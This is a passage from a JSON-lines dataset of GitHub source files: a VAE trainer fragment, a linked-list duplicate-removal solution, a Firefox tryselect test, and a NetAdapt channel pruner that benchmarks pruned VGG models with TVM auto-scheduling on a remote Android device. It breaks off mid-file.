], dim=0)\n\n self.writer.add_image('recons',\n make_grid(vis_im.detach().cpu(),\n nrow=N_sample, normalize=True))\n\n # self.writer.add_image('input',\n # make_grid(plot_gram_cam(data[:64], self.grad_cam),\n # nrow=8, normalize=True))\n\n if batch_idx == self.len_epoch:\n break\n log = self.train_metrics.result()\n\n if self.do_valid:\n val_log = self._valid_epoch(epoch)\n # log.update(**{'val_'+k: v for k, v in val_log.items()})\n\n if self.lr_scheduler is not None:\n self.lr_scheduler.step()\n return log\n\n def _valid_epoch(self, epoch):\n \"\"\"\n validate after training an epoch\n\n :param epoch: Integer, current training epoch.\n :return: A log that contains information about valid\n \"\"\"\n self.model.eval()\n self.valid_metrics.reset()\n with torch.no_grad():\n if self.fix_noise is None:\n N = 64\n D = self.config['arch']['args']['latent_dim']\n self.fix_noise = torch.randn((N, D)).to(self.device)\n\n gen_sample = self.model.decode(self.fix_noise)\n\n # for batch_idx, (data, target) in enumerate(self.valid_data_loader):\n # data, target = data.to(self.device), target.to(self.device)\n\n # output = self.model(data)\n # loss = self.criterion(output, target)\n\n # # update record\n # self.valid_metrics.update('loss', loss.item())\n # for met in self.metric_ftns:\n # self.valid_metrics.update(\n # met.__name__, met(output, target))\n # # self.writer.add_image('input', make_grid(data.cpu(), nrow=8, normalize=True))\n\n self.writer.set_step(\n epoch - 1, 'valid')\n # self.valid_metrics.log_all()\n self.writer.add_image('generate',\n make_grid(gen_sample.detach().cpu(),\n nrow=8, normalize=True))\n # add histogram of model parameters to the tensorboard\n # for name, p in self.model.named_parameters():\n # self.writer.add_histogram(name, p, bins='auto')\n return self.valid_metrics.result()\n\n def _progress(self, batch_idx):\n base = '[{}/{} ({:.0f}%)]'\n if hasattr(self.data_loader, 'n_samples'):\n current = batch_idx * self.data_loader.batch_size\n total = self.data_loader.n_samples\n else:\n current = batch_idx\n total = self.len_epoch\n return base.format(current, total, 100.0 * current / total)\n","repo_name":"592McAvoy/ml-proj2","sub_path":"trainer/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":7234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19080603837","text":"# class LLNode:\n# def __init__(self, val, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n # Own solution w/ try-except block\n def solve(self, node):\n\n values = {}\n prev = None\n cur = node\n\n while cur:\n\n nxt = cur.next\n\n try:\n test = values[cur.val]\n\n # Test variable will pass if we have a duplicate. \n cur = None\n\n if prev != None:\n prev.next = nxt\n except:\n values[cur.val] = 0\n prev = cur\n \n cur = nxt\n \n return node\n \n # educative.io's solution with conditionals, faster than declaring {test}\n def solve2(self, node):\n\n cur = node\n prev = None\n dup_values = dict()\n\n while cur:\n if cur.val in dup_values:\n # Remove node:\n prev.next = cur.next\n cur = None\n else:\n # Have not encountered element before.\n dup_values[cur.val] = 1\n prev = cur\n \n cur = prev.next\n \n return node\n","repo_name":"Ry4nW/python-wars","sub_path":"binarysearch/removeDuplicatesInLL.py","file_name":"removeDuplicatesInLL.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"40666863923","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport os\n\nimport mozunit\nimport pytest\nfrom six.moves import reload_module as reload\nfrom tryselect import push\nfrom tryselect.selectors import again\n\n\n@pytest.fixture(autouse=True)\ndef patch_history_path(tmpdir, monkeypatch):\n monkeypatch.setattr(push, \"history_path\", tmpdir.join(\"history.json\").strpath)\n reload(again)\n\n\ndef test_try_again(monkeypatch):\n push.push_to_try(\n \"fuzzy\",\n \"Fuzzy message\",\n try_task_config=push.generate_try_task_config(\n \"fuzzy\",\n [\"foo\", \"bar\"],\n {\"use-artifact-builds\": True},\n ),\n )\n\n assert os.path.isfile(push.history_path)\n with open(push.history_path, \"r\") as fh:\n assert len(fh.readlines()) == 1\n\n def fake_push_to_try(*args, **kwargs):\n return args, kwargs\n\n monkeypatch.setattr(push, \"push_to_try\", fake_push_to_try)\n reload(again)\n\n args, kwargs = again.run()\n\n assert args[0] == \"again\"\n assert args[1] == \"Fuzzy message\"\n\n try_task_config = kwargs.pop(\"try_task_config\")\n assert sorted(try_task_config.get(\"tasks\")) == sorted([\"foo\", \"bar\"])\n assert try_task_config.get(\"env\") == {\"TRY_SELECTOR\": \"fuzzy\"}\n assert try_task_config.get(\"use-artifact-builds\")\n\n with open(push.history_path, \"r\") as fh:\n assert len(fh.readlines()) == 1\n\n\ndef test_no_push_does_not_generate_history(tmpdir):\n assert not os.path.isfile(push.history_path)\n\n push.push_to_try(\n \"fuzzy\",\n \"Fuzzy\",\n try_task_config=push.generate_try_task_config(\n \"fuzzy\",\n [\"foo\", \"bar\"],\n {\"use-artifact-builds\": True},\n ),\n dry_run=True,\n )\n assert not os.path.isfile(push.history_path)\n assert again.run() == 1\n\n\nif __name__ == \"__main__\":\n mozunit.main()\n","repo_name":"WaterfoxCo/Waterfox","sub_path":"tools/tryselect/test/test_again.py","file_name":"test_again.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":3159,"dataset":"github-code","pt":"34"} +{"seq_id":"35940291737","text":"from multiprocessing import Process\nimport logging\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nimport copy\nimport json\nimport torch\nfrom schema import And, Optional\n\nfrom nni.utils import OptimizeMode\n\nfrom nni.compression.pytorch.compressor import Pruner\nfrom nni.compression.pytorch.utils.config_validation import CompressorSchema\nfrom nni.compression.pytorch.utils.num_param_counter import get_total_num_weights\nfrom .constants_pruner import PRUNER_DICT\n\n################### TVM build part addition ###############\nfrom pruned_vgg_maxpool import VGG \nimport _pickle as cPickle\nimport time\nimport torch.onnx\nimport onnxruntime\nimport tensorflow as tf\n\nimport socket\nimport sys \n\nimport tvm\nfrom tvm import relay, auto_scheduler\nimport numpy as np\nimport tvm.relay.testing\nfrom tvm.autotvm.tuner import XGBTuner, GATuner, RandomTuner, GridSearchTuner\nfrom tvm import rpc\nfrom tvm.contrib import utils, ndk, graph_runtime as runtime\n#from tvm.contrib import graph_executor ## for normal running\nfrom tvm.contrib.debugger import debug_executor as graph_executor ## for debugging\n#from torchsummary import summary\nfrom nni.compression.pytorch.utils.counter import count_flops_params\n\nfrom nni.compression.pytorch import ModelSpeedup\nimport gc\n###########################################################\n\n\n_logger = logging.getLogger(__name__)\n\n\nclass NetAdaptPruner(Pruner):\n \"\"\"\n A Pytorch implementation of NetAdapt compression algorithm.\n\n Parameters\n ----------\n model : pytorch model\n The model to be pruned.\n config_list : list\n Supported keys:\n - sparsity : The target overall sparsity.\n - op_types : The operation type to prune.\n short_term_fine_tuner : function\n function to short-term fine tune the masked model.\n This function should include `model` as the only parameter,\n and fine tune the model for a short term after each pruning iteration.\n Example::\n\n def short_term_fine_tuner(model, epoch=3):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n train_loader = ...\n criterion = torch.nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(model.parameters(), lr=0.01)\n model.train()\n for _ in range(epoch):\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = criterion(output, target)\n loss.backward()\n optimizer.step()\n evaluator : function\n function to evaluate the masked model.\n This function should include `model` as the only parameter, and returns a scalar value.\n Example::\n\n def evaluator(model):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n val_loader = ...\n model.eval()\n correct = 0\n with torch.no_grad():\n for data, target in val_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n # get the index of the max log-probability\n pred = output.argmax(dim=1, keepdim=True)\n correct += pred.eq(target.view_as(pred)).sum().item()\n accuracy = correct / len(val_loader.dataset)\n return accuracy\n optimize_mode : str\n optimize mode, `maximize` or `minimize`, by default `maximize`.\n base_algo : str\n Base pruning algorithm. `level`, `l1`, `l2` or `fpgm`, by default `l1`. Given the sparsity distribution among the ops,\n the assigned `base_algo` is used to decide which filters/channels/weights to prune.\n sparsity_per_iteration : float\n sparsity to prune in each iteration.\n experiment_data_dir : str\n PATH to save experiment data,\n including the config_list generated for the base pruning algorithm and the performance of the pruned model.\n \"\"\"\n\n def __init__(self, model, config_list, short_term_fine_tuner, evaluator, val_loader, num, dummy_input, criterion,\n optimize_mode='maximize', base_algo='l1', sparsity_per_iteration=0.01, experiment_data_dir='./'):\n # models used for iterative pruning and evaluation\n self._model_to_prune = copy.deepcopy(model)\n self._base_algo = base_algo\n\n super().__init__(model, config_list)\n\n self._short_term_fine_tuner = short_term_fine_tuner\n self._evaluator = evaluator\n self._optimize_mode = OptimizeMode(optimize_mode)\n\n # hyper parameters for NetAdapt algorithm\n self._sparsity_per_iteration = sparsity_per_iteration\n\n # overall pruning rate\n self._sparsity = config_list[0]['sparsity']\n\n # config_list\n self._config_list_generated = []\n\n self._experiment_data_dir = experiment_data_dir\n if not os.path.exists(self._experiment_data_dir):\n os.makedirs(self._experiment_data_dir)\n\n self._tmp_model_path = os.path.join(self._experiment_data_dir, 'tmp_model.pth')\n\n # addition\n self._num = num\n self._val_loader = val_loader\n self._criterion = criterion\n self._dummy_input = dummy_input\n\n def validate_config(self, model, config_list):\n \"\"\"\n Parameters\n ----------\n model : torch.nn.Module\n Model to be pruned\n config_list : list\n List on pruning configs\n \"\"\"\n\n if self._base_algo == 'level':\n schema = CompressorSchema([{\n 'sparsity': And(float, lambda n: 0 < n < 1),\n Optional('op_types'): [str],\n Optional('op_names'): [str],\n }], model, _logger)\n elif self._base_algo in ['l1', 'l2', 'fpgm']:\n schema = CompressorSchema([{\n 'sparsity': And(float, lambda n: 0 < n < 1),\n 'op_types': ['Conv2d'],\n Optional('op_names'): [str]\n }], model, _logger)\n\n schema.validate(config_list)\n\n def calc_mask(self, wrapper, **kwargs):\n return None\n\n def _update_config_list(self, config_list, op_name, sparsity):\n '''\n update sparsity of op_name in config_list\n '''\n config_list_updated = copy.deepcopy(config_list)\n\n for idx, item in enumerate(config_list):\n if op_name in item['op_names']:\n config_list_updated[idx]['sparsity'] = sparsity\n return config_list_updated\n\n # if op_name is not in self._config_list_generated, create a new json item\n if self._base_algo in ['l1', 'l2', 'fpgm']:\n config_list_updated.append(\n {'sparsity': sparsity, 'op_types': ['Conv2d'], 'op_names': [op_name]})\n elif self._base_algo == 'level':\n config_list_updated.append(\n {'sparsity': sparsity, 'op_names': [op_name]})\n\n return config_list_updated\n\n def _get_op_num_weights_remained(self, op_name, module):\n '''\n Get the number of weights remained after channel pruning with current sparsity\n\n Returns\n -------\n int\n remained number of weights of the op\n '''\n\n # if op is wrapped by the pruner\n for wrapper in self.get_modules_wrapper():\n if wrapper.name == op_name:\n return wrapper.weight_mask.sum().item()\n\n # if op is not wrapped by the pruner\n return module.weight.data.numel()\n\n def _get_op_sparsity(self, op_name):\n for config in self._config_list_generated:\n if 'op_names' in config and op_name in config['op_names']:\n return config['sparsity']\n return 0\n\n def _calc_num_related_weights(self, op_name):\n '''\n Calculate total number weights of the op and the next op, applicable only for models without dependencies among ops\n\n Parameters\n ----------\n op_name : str\n\n Returns\n -------\n int\n total number of all the realted (current and the next) op weights\n '''\n num_weights = 0\n flag_found = False\n previous_name = None\n previous_module = None\n\n for name, module in self._model_to_prune.named_modules():\n if not flag_found and name != op_name and type(module).__name__ in ['Conv2d', 'Linear']:\n previous_name = name\n previous_module = module\n if not flag_found and name == op_name:\n _logger.debug(\"original module found: %s\", name)\n num_weights = module.weight.data.numel()\n\n # consider related pruning in this op caused by previous op's pruning\n if previous_module:\n sparsity_previous_op = self._get_op_sparsity(previous_name)\n if sparsity_previous_op:\n _logger.debug(\n \"decrease op's weights by %s due to previous op %s's pruning...\", sparsity_previous_op, previous_name)\n num_weights *= (1-sparsity_previous_op)\n\n flag_found = True\n continue\n if flag_found and type(module).__name__ in ['Conv2d', 'Linear']:\n _logger.debug(\"related module found: %s\", name)\n # channel/filter pruning crossing is considered here, so only the num_weights after channel pruning is valuable\n num_weights += self._get_op_num_weights_remained(name, module)\n break\n\n _logger.debug(\"num related weights of op %s : %d\", op_name, num_weights)\n\n return num_weights\n\n def _test3(self, model, input_name, ctx, text):\n test_loss = 0 \n correct = 0 \n total_time = 0 \n cases = 20\n loc = 0 \n warm_up = 10\n with torch.no_grad():\n for data, target in self._val_loader:\n loc = loc + 1 \n if loc % 5 == 0:\n print(loc)\n if loc == cases + 1:\n break\n output_arr = np.array([1,2])\n for i in range(len(target)):\n model.set_input(input_name, np.expand_dims(data[i], 0)) \n t0 = time.time()\n model.run()\n t1 = time.time()\n if loc > warm_up:\n total_time += (t1 - t0) \n output = model.get_output(0)\n output = output.asnumpy()\n output = np.ravel(output, order='C')\n if i == 0:\n output_arr = output\n else:\n output_arr = np.append(output_arr, output, axis=0)\n output_arr = output_arr.reshape(len(target), 10) \n output_arr = torch.from_numpy(output_arr)\n # sum up batch loss\n test_loss += self._criterion(output_arr, target).item()\n # get the index of the max log-probability\n pred = output_arr.argmax(dim=1, keepdim=True)\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n real_cases = (cases - warm_up) * len(target)\n# test_loss /= real_cases\n# accuracy = correct / real_cases\n latency = (total_time*1000) / real_cases\n# fps2 = real_cases / total_time\n print('{} Latency: {:.6f}'.format(text, latency))\n# print('{} Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%), Latency: {:.6f}'.format(\n# text, test_loss, correct, real_cases, 100. * accuracy, latency))\n\n return latency\n\n def _tune_tasks(\n self,\n tasks,\n measure_option,\n tuner=\"xgb\",\n n_trial=1000,\n early_stopping=None,\n log_filename=\"tuning.log\",\n use_transfer_learning=True,\n ):\n # create tmp log file\n tmp_log_file = log_filename + \".tmp\"\n if os.path.exists(tmp_log_file):\n os.remove(tmp_log_file)\n\n for i, tsk in enumerate(reversed(tasks)):\n prefix = \"[Task %2d/%2d] \" % (i+1, len(tasks))\n # create tuner\n if tuner == \"xgb\" or tuner == \"xgb-rank\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank\")\n elif tuner == \"ga\":\n tuner_obj = GATuner(tsk, pop_size=100)\n elif tuner == \"random\":\n tuner_obj = RandomTuner(tsk)\n elif tuner == \"gridsearch\":\n tuner_obj = GridSearchTuner(tsk)\n else:\n raise ValueError(\"Invalid tuner: \" + tuner)\n\n if use_transfer_learning:\n if os.path.isfile(tmp_log_file):\n tuner_obj.load_history(autotvm.record.load_from_file(tmp_log_file))\n\n # do tuning\n tsk_trial = min(n_trial, len(tsk.config_space))\n tuner_obj.tune(\n n_trial=tsk_trial,\n early_stopping=early_stopping,\n measure_option=measure_option,\n callbacks=[\n autotvm.callback.progress_bar(tsk_trial, prefix=prefix),\n autotvm.callback.log_to_file(tmp_log_file),\n ],\n )\n\n # pick best records to a cache file\n autotvm.record.pick_best(tmp_log_file, log_filename)\n os.remove(tmp_log_file)\n\n def compress(self):\n \"\"\"\n Compress the model.\n\n Returns\n -------\n torch.nn.Module\n model with specified modules compressed.\n \"\"\"\n _logger.info('Starting NetAdapt Compression...')\n from PIL import Image\n from tvm.contrib.download import download_testdata\n img_url = \"https://github.com/dmlc/mxnet.js/blob/main/data/cat.png?raw=true\"\n img_path = download_testdata(img_url, \"cat.png\", module=\"data\")\n img = Image.open(img_path).resize((32, 32))\n from torchvision import transforms\n my_preprocess = transforms.Compose(\n [\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(32, 4),\n transforms.ToTensor(), \n transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010]),\n ]\n )\n img = my_preprocess(img)\n img = np.expand_dims(img, 0)\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else 'cpu')\n arch = \"arm64\"\n target = \"llvm -mtriple=%s-linux-android\" % arch \n# target = \"opencl --device=mali\"\n# target_host = \"llvm -mtriple=arm64-linux-android\"\n# my_shape = cPickle.load(open(os.path.join('/github/evta2/output', str(num), 'my_shape.p'),'rb'))\n# torch_model = VGG(my_shape=my_shape, depth=16).to(device)\n# torch_model.load_state_dict(torch.load(os.path.join('/github/evta2/output', str(num), 'model_trained.pth')))\n# torch_model.eval()\n################# Autotune added\n network = \"vgg\"\n device_key = \"android\"\n log_file = \"%s.%s.log\" % (device_key, network)\n dtype = \"float32\"\n use_android = True\n################################\n self._model_to_prune.eval()\n _, _, temp_results = count_flops_params(self._model_to_prune, (1, 3, 32, 32))\n print(\"=================== Model info test ======================\")\n print(temp_results[1].get('input_size')[1])\n print(\"========================= end ============================\")\n input_shape = [1, 3, 32, 32]\n output_shape = [1, 10]\n input_data = torch.randn(input_shape).to(device)\n scripted_model = torch.jit.trace(self._model_to_prune, input_data).eval()\n# scripted_model = torch.jit.trace(torch_model, input_data).eval()\n input_name = \"input0\"\n shape_list = [(input_name, img.shape)]\n mod, params = relay.frontend.from_pytorch(scripted_model, shape_list)\n ########### NCHW -> NHWC ############\n desired_layouts = {'nn.conv2d': ['NHWC', 'default'], 'nn.dense': ['NHWC', 'default']}\n seq = tvm.transform.Sequential([relay.transform.RemoveUnusedFunctions(),\n relay.transform.ConvertLayout(desired_layouts),\n relay.transform.InferType(),\n relay.transform.FoldConstant(),\n# relay.transform.DebugPrint(),\n relay.transform.DeadCodeElimination()])\n with tvm.transform.PassContext(opt_level=3):\n mod = seq(mod)\n# print(\"=============== Relay IR Module ================\")\n# print(mod)\n #####################################\n tracker_host = os.environ.get(\"TVM_TRACKER_HOST\", \"0.0.0.0\")\n tracker_port = int(os.environ.get(\"TVM_TRACKER_PORT\", 9191))\n\n #################### Extract search tasks ###################\n print(\"Extract tasks...\")\n tasks, task_weights = auto_scheduler.extract_tasks(mod[\"main\"], params, target)\n# tasks, task_weights = auto_scheduler.extract_tasks(mod[\"main\"], params, target=\"opencl --device=mali\", target_host=target)\n print(\"=============== Weights check ==============\")\n print(task_weights)\n\n for idx, task in enumerate(tasks): \n print(\"============ Task %d (workload key: %s) ===========\" % (idx, task.workload_key))\n print(task)\n# print(task.compute_dag) \n \n #################### Tuning #####################\n print(\"Begin tuning...\")\n tuner = auto_scheduler.TaskScheduler(tasks, task_weights)\n# print(tuner.task_tags)\n\n tune_option = auto_scheduler.TuningOptions(\n num_measure_trials=2000, #17,\n builder=auto_scheduler.LocalBuilder(build_func=\"ndk\" if use_android else \"default\"),\n runner=auto_scheduler.RPCRunner(device_key, host=tracker_host, port=tracker_port, timeout=10000, repeat=1, min_repeat_ms=200, enable_cpu_cache_flush=True,),\n measure_callbacks=[auto_scheduler.RecordToFile(log_file)],\n\t verbose=1,\n early_stopping=24,\n )\n tuner.tune(tune_option)#, per_task_early_stopping=30)\n \n #################### Compile ####################\n print(\"Compile...\")\n with auto_scheduler.ApplyHistoryBest(log_file):\n with tvm.transform.PassContext(opt_level=3, config={\"relay.backend.use_auto_scheduler\": True}):\n lib = relay.build_module.build(mod, params=params, target=target)\n# lib = relay.build(mod, params=params, target=\"opencl\", target_host=target)\n \n tmp = utils.tempdir()\n lib_fname = tmp.relpath(\"net.so\")\n lib.export_library(lib_fname, ndk.create_shared)\n remote = auto_scheduler.utils.request_remote(device_key, tracker_host, tracker_port, timeout=10000)\n remote.upload(lib_fname)\n rlib = remote.load_module(\"net.so\")\n\n # Create graph executor\n ctx = remote.cpu()\n# ctx = remote.cl(0)\n# module = graph_executor.GraphModule(rlib[\"default\"](ctx))\n module = graph_executor.GraphModuleDebug(rlib[\"default\"](ctx), [ctx], rlib.get_json(), dump_root=\"./tvmdbg\")\n\n current_latency = self._test3(module, input_name, ctx, \"TVM_initial\")\n# data_tvm = tvm.nd.array((np.random.uniform(size=input_shape)).astype(dtype))\n# module.set_input(input_name, data_tvm)\n# print(\"Evaluate inference time cost...\")\n# ftimer = module.module.time_evaluator(\"run\", ctx, repeat=3, min_repeat_ms=500)\n# prof_res = np.array(ftimer().results) * 1e3\n# print(\"Mean inference time (std dev): %8.4f ms (%8.4f ms)\" %(np.mean(prof_res), np.std(prof_res)))\n# current_latency = np.mean(prof_res)\n #################################################\n input_data = None\n scripted_model = None\n mod = None\n params = None\n lib = None\n lib_fname = None\n tracker_host = None\n tracker_port = None\n tracker = None\n remote = None\n ctx = None\n rlib = None\n module = None\n del input_data\n del scripted_model\n del mod\n del params\n del lib\n del lib_fname\n del tracker_host\n del tracker_port\n del tracker\n del remote\n del ctx\n del rlib\n del module\n gc.collect()\n \n pruning_iteration = 1\n delta_num_weights_per_iteration = \\\n int(get_total_num_weights(self._model_to_prune, ['Conv2d', 'Linear']) * self._sparsity_per_iteration)\n init_resource_reduction_ratio = 0.025 # 0.05 \n resource_reduction_decay = 0.96 #0.98\n max_iter = 120\n\n budget = 13.421 #budget_times * current_fps\n init_resource_reduction = init_resource_reduction_ratio * current_latency\n print('Current latency: {:>8.4f}'.format(current_latency))\n file_object = open('./record_tvm.txt', 'a')\n file_object.write('Budget: {:>8.4f}, Current latency: {:>8.4f}\\n'.format(budget, current_latency))\n file_object.close()\n current_accuracy = self._evaluator(self._model_to_prune)\n improper_layer = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n subgroup_num = 3\n subgroup_criterion = 14 - subgroup_num\n next_additional_cut = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n # stop condition\n# while pruning_iteration < max_iter and current_latency > budget:\n while pruning_iteration < max_iter and subgroup_criterion > 1 - subgroup_num:\n _logger.info('Pruning iteration: %d', pruning_iteration)\n\n # calculate target sparsity of this iteration\n# target_sparsity = current_sparsity + self._sparsity_per_iteration\n target_latency = current_latency - init_resource_reduction * (\n resource_reduction_decay ** (pruning_iteration - 1))\n\n # Print the message\n print('=======================')\n print(('Process iteration {:>3}: current_accuracy = {:>8.3f}, '\n 'current_latency = {:>8.3f}, target_latency = {:>8.3f} \\n').format(pruning_iteration, current_accuracy, current_latency, target_latency)) \n file_object = open('./record_tvm.txt', 'a') \n file_object.write(('Process iteration {:>3}: current_accuracy = {:>8.3f}, '\n 'current_latency = {:>8.3f}, target_resource = {:>8.3f} \\n').format(pruning_iteration, current_accuracy, current_latency, target_latency))\n file_object.close()\n\n # variable to store the info of the best layer found in this iteration\n best_op = {}\n improper_idx = 0\n layer_idx = 1\n total_channel = 0\n\n for wrapper in self.get_modules_wrapper():\n if layer_idx < subgroup_criterion:\n print('Not in subgroup: layer {:2d}'.format(layer_idx))\n layer_idx += 1\n improper_idx += 1\n continue\n current_op_sparsity = 1 - wrapper.weight_mask.sum().item() / wrapper.weight_mask.numel()\n\n # sparsity that this layer needs to prune to satisfy the requirement\n# target_op_sparsity = current_op_sparsity + delta_num_weights_per_iteration / self._calc_num_related_weights(wrapper.name)\n\n if layer_idx > 7:\n total_channels = 512 \n elif layer_idx > 4:\n total_channels = 256 \n elif layer_idx > 2:\n total_channels = 128 \n else:\n total_channels = 64\n print('current_op_sparsity: {:>8.4f}'.format(current_op_sparsity))\n if current_op_sparsity < 0.125:\n target_op_sparsity = 0.125 + next_additional_cut[improper_idx] * (8 / total_channels) # initial sparsity\n# elif current_op_sparsity + 8 / total_channels == 1:\n elif current_op_sparsity >= 1 - 0.0625:\n subgroup_criterion -= 1\n improper_layer[improper_idx] = 1 \n file_object = open('./record_tvm.txt', 'a')\n file_object.write('Improper Layer: {} \\n'.format(wrapper.name))\n file_object.close()\n improper_idx += 1\n continue\n else:\n target_op_sparsity = current_op_sparsity + (1 + next_additional_cut[improper_idx]) * (8 / total_channels)\n ch_num = int((1 - target_op_sparsity) * total_channels)\n layer_idx += 1\n\n if improper_layer[improper_idx] == 1:\n print('Improper layer')\n file_object = open('./record_tvm.txt', 'a')\n file_object.write('Improper Layer: ' + wrapper.name + '\\n')\n file_object.close()\n improper_idx += 1\n continue\n\n while_count = 0\n\n while True:\n while_count += 1\n config_list = self._update_config_list(self._config_list_generated, wrapper.name, target_op_sparsity)\n pruner = PRUNER_DICT[self._base_algo](copy.deepcopy(self._model_to_prune), config_list)\n model_masked = pruner.compress()\n\n # added 0: speed_up\n pruner.export_model('./model_masked.pth', './mask.pth')\n model = VGG(depth=self.num).to(device)\n model.load_state_dict(torch.load('./model_masked.pth'))\n masks_file = './mask.pth'\n m_speedup = ModelSpeedup(model, self._dummy_input, masks_file, device)\n m_speedup.speedup_model()\n # added 1: Autotune + TVM build\n model.eval()\n _, _, _ = count_flops_params(model, (1, 3, 32, 32))\n input_shape = [1, 3, 32, 32]\n output_shape = [1, 10]\n input_data = torch.randn(input_shape).to(device)\n# scripted_model = torch.jit.trace(self._model_to_prune, input_data).eval()\n scripted_model = torch.jit.trace(model, input_data).eval()\n input_name = \"input0\"\n shape_list = [(input_name, img.shape)]\n mod, params = relay.frontend.from_pytorch(scripted_model, shape_list)\n ########### NCHW -> NHWC ############\n desired_layouts = {'nn.conv2d': ['NHWC', 'default'], 'nn.dense': ['NHWC', 'default']} # added\n seq = tvm.transform.Sequential([relay.transform.RemoveUnusedFunctions(),\n relay.transform.ConvertLayout(desired_layouts)])\n with tvm.transform.PassContext(opt_level=3):\n mod = seq(mod)\n #####################################\n tracker_host = os.environ.get(\"TVM_TRACKER_HOST\", \"0.0.0.0\")\n tracker_port = int(os.environ.get(\"TVM_TRACKER_PORT\", 9190))\n #################### Extract search tasks ###################\n print(\"Extract tasks...\")\n tasks, task_weights = auto_scheduler.extract_tasks(mod[\"main\"], params, target)\n print(\"=============== Weights check ==============\")\n print(task_weights)\n\n for idx, task in enumerate(tasks):\n print(\"============ Task %d (workload key: %s) ===========\" % (idx, task.workload_key))\n print(task.compute_dag)\n #################### Tuning #####################\n print(\"Begin tuning...\")\n tuner = auto_scheduler.TaskScheduler(tasks, task_weights)\n tune_option = auto_scheduler.TuningOptions(\n num_measure_trials=5000,\n builder=auto_scheduler.LocalBuilder(build_func=\"ndk\" if use_android else \"default\"),\n runner=auto_scheduler.RPCRunner(device_key, host=tracker_host, port=tracker_port, timeout=10000, repeat=1, min_repeat_ms=200, enable_cpu_cache_flush=True,),\n measure_callbacks=[auto_scheduler.RecordToFile(log_file)],\n#\t\t\tverbose=1,\n )\n tuner.tune(tune_option, per_task_early_stopping=30)\n #################### Compile ####################\n print(\"Compile...\")\n with auto_scheduler.ApplyHistoryBest(log_file):\n with tvm.transform.PassContext(opt_level=3, config={\"relay.backend.use_auto_scheduler\": True}):\n lib = relay.build(mod, target=target, params=params)\n \n tmp = utils.tempdir()\n lib_fname = tmp.relpath(\"net.so\")\n lib.export_library(lib_fname, ndk.create_shared)\n remote = auto_scheduler.utils.request_remote(device_key, tracker_host, tracker_port, timeout=10000)\n remote.upload(lib_fname)\n rlib = remote.load_module(\"net.so\")\n ctx = remote.cpu()\n# ctx = remote.cl()\n module = graph_executor.GraphModule(rlib[\"default\"](ctx))\n\n temp_latency = self._test3(module, input_name, ctx, \"TVM_initial\")\n# data_tvm = tvm.nd.array((np.random.uniform(size=input_shape)).astype(dtype))\n# module.set_input(input_name, data_tvm)\n# print(\"Evaluate inference time cost...\")\n# ftimer = module.module.time_evaluator(\"run\", ctx, repeat=3, min_repeat_ms=500)\n# prof_res = np.array(ftimer().results) * 1e3\n# print(\"Mean inference time (std dev): %8.4f ms (%8.4f ms)\" %(np.mean(prof_res), np.std(prof_res)))\n# temp_latency = np.mean(prof_res)\n #################################################\n\n input_data = None\n scripted_model = None\n mod = None\n params = None\n lib = None\n lib_fname = None\n tracker_host = None\n tracker_port = None\n tracker = None\n remote = None\n ctx = None\n rlib = None\n module = None\n del input_data\n del scripted_model\n del mod\n del params\n del lib\n del lib_fname\n del tracker_host\n del tracker_port\n del tracker\n del remote\n del ctx\n del rlib\n del module\n gc.collect()\n\n print('Layer: {}, Temp latency: {:>8.4f}, Channel: {:4d}'.format(wrapper.name, temp_latency, ch_num))\n file_object = open('./record_tvm.txt', 'a')\n file_object.write('Layer: {}, Temp latency: {:>8.4f}, Channel: {:4d}\\n'.format(wrapper.name, temp_latency, ch_num))\n file_object.close()\n\n if temp_latency <= target_latency:\n next_additional_cut[improper_idx] += int(while_count / 3)\n break\n else:\n# if target_op_sparsity < 1 - 10 / total_channels:\n# target_op_sparsity += 8 / total_channels\n# ch_num -= 8\n if target_op_sparsity < 1 - 0.0625:\n if total_channels <= 128 and target_op_sparsity < 1 - 0.125:\n target_op_sparsity += 0.125\n ch_num -= int(0.125 * total_channels)\n else:\n target_op_sparsity += 0.0625\n ch_num -= int(0.0625 * total_channels)\n else:\n subgroup_criterion -= 1\n print('Improper layer')\n improper_layer[improper_idx] = 1\n file_object = open('./record_tvm.txt', 'a')\n file_object.write('Improper layer: {} \\n'.format(wrapper.name))\n file_object.close()\n break\n\n # Short-term fine tune the pruned model\n if improper_layer[improper_idx] == 0:\n self._short_term_fine_tuner(model_masked, epochs=2)\n performance = self._evaluator(model_masked)\n print('Layer: {}, Evaluation result after short-term fine tuning: {:>8.4f}'.format(wrapper.name, performance))\n file_object = open('./record_tvm.txt', 'a')\n file_object.write('Layer: {}, Accuracy: {:>8.4f}\\n'.format(wrapper.name, performance))\n file_object.close()\n\n if temp_latency <= target_latency and \\\n ( not best_op \\\n or (self._optimize_mode is OptimizeMode.Maximize and performance >= best_op['performance']) \\\n or (self._optimize_mode is OptimizeMode.Minimize and performance < best_op['performance'])):\n _logger.debug(\"updating best layer to %s...\", wrapper.name)\n # find weight mask of this layer\n for w in pruner.get_modules_wrapper():\n if w.name == wrapper.name:\n masks = {'weight_mask': w.weight_mask,\n 'bias_mask': w.bias_mask}\n break\n best_op = {\n 'op_name': wrapper.name,\n 